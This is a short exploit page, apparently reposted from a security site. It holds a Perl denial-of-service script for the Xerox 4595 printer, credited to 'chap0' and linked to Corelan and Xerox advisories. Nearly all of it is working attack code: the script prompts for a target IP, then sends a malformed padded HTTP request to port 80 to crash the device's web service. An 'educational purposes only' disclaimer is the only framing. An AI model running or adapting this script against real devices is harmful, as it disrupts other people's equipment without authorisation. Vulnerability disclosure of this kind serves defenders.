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Xerox 4595 Denial of Service Vulnerability
来源:www.seek-truth.net 作者:chap0 发布时间:2010-11-02  

# Xerox 4595 Remote Dos
# November 1, 2010
# By chap0 - The tongue has the power of life and death
# [www.seek-truth.net][www.corelan.be:8800]
# Public Advisories
# http://www.xerox.com/downloads/usa/en/c/cert_XRX10-004_v1.0.pdf
# http://www.corelan.be:8800/advisories.php?id=CORELAN-10-065
# Greets to Corelan Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Script provided 'as is', without any warranty. Use for educational purposes only.
# Do not use this code to do anything illegal! Corelan does not want anyone to use this script
# for malicious and/or illegal purposes. Corelan cannot be held responsible for any illegal use.
# Note : you are not allowed to edit/modify this code. 
# If you do, Corelan cannot be held responsible for any damages this may cause.

use IO::Socket;

my $head = "http://";
my $code = "\x41" x 25;
$code=$code."\x25" x 4;
$code=$code."\x41" x 347;

print "\nEnter the IP of the Xerox 4595 to DoS: ";
chomp ($ip = <STDIN>);

my $dos = $head.$ip.$code;

$sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => 80, Proto => "tcp" ); die "Check your connection: $!\n" unless $sock;

print $sock "$dos\r\n";

close ($sock);

print "Connect to $ip in a browser to see if the Dos was successful\n";

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